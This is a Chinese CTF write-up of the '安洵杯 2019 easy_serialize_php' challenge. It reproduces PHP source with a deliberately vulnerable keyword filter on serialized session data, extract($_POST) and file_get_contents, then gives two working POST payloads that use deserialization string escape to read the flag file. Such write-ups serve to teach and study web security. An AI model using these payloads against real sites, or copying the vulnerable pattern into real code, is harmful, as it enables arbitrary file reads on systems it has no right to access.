[安洵杯 2019]easy_serialize_php PHP反序列化逃逸

前言

　　最近都沒刷題了，成懶狗了。。。

知識點

　　PHP反序列化逃逸

　　任何具有一定結構的數據，只要經過了某些處理而把自身結構改變，則可能會產生漏洞

　　關鍵詞數增加

　　例如： where->hacker，這樣詞數由五個增加到6個

　　關鍵詞數減少

　　例如：直接過濾掉一些關鍵詞

 

解題

　　打開題目有個鏈接，抓包有提示，直接訪問，發現源碼

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
} 

　　簡單分析，發現有個phpinfo,訪問一下，發現 d0g3_f1ag.php，讀取，將關鍵代碼放在一起

$function = @$_GET['f'];

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

分析

　　根據上面可以清楚，f是我們用get方法傳參得到的變量並由$function接收。
　　$function發揮作用的代碼塊，在最下方的判斷句。
　　咱們初步訪問的時候f=highlight_file,
　　判斷句中給了提示，那麼f=phpinfo時，我們就看到了phpinfo的頁面,phpinfo有很多配置項會顯示。
　　我們發現了auto_append_file d0g3_f1ag.php 在頁面底部加載文件d0g3_f1ag.php。
　　所以可以猜測flag應該要從d0g3_f1ag.php拿。
　　當f=show_image是可以讀文件的，只要$userinfo[‘img’]是相應的flag.php的base64加密，所以我們先記住這個點，一會肯定要用
　　看最後的源碼有個高危函數file_get_contents

思路

　　雖然他會將一些關鍵詞置空，但是我們可以利用這一點造成字符逃逸，從而控制$userinfo["img"]的值，達到任意文件讀取的效果**，雖然他沒有設置SESSION_START但是他用了extract($_POST);我們就可以通過發出POST請求來覆蓋SESSION**

　　將代碼複製測試

　　SESSION有個三個鍵分別爲user，function，img，控制img的值，就得放一個讓img變成base64加密後的d0g3_f1ag.php，因爲我們知道有過濾數組，我們就可以通過這個來吞掉後面的內容從而形成一個完整的序列化

　　鍵值逃逸 playload

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=p";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"ab";s:2:"sb";}

　　s：24 將";s:8:“function”;s:62:"p給吞掉了，而由於SESSION有三個鍵，所以需要在後面添加一個鍵（隨意）

　　

 

 　　鍵名逃逸payload

_SESSION[flagphp]=;s:2:"db";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

　　同原理

 

 

參考鏈接

　　https://blog.csdn.net/weixin_43900387/article/details/105632663?utm_medium=distribute.pc_relevant.none-task-blog-baidujs-2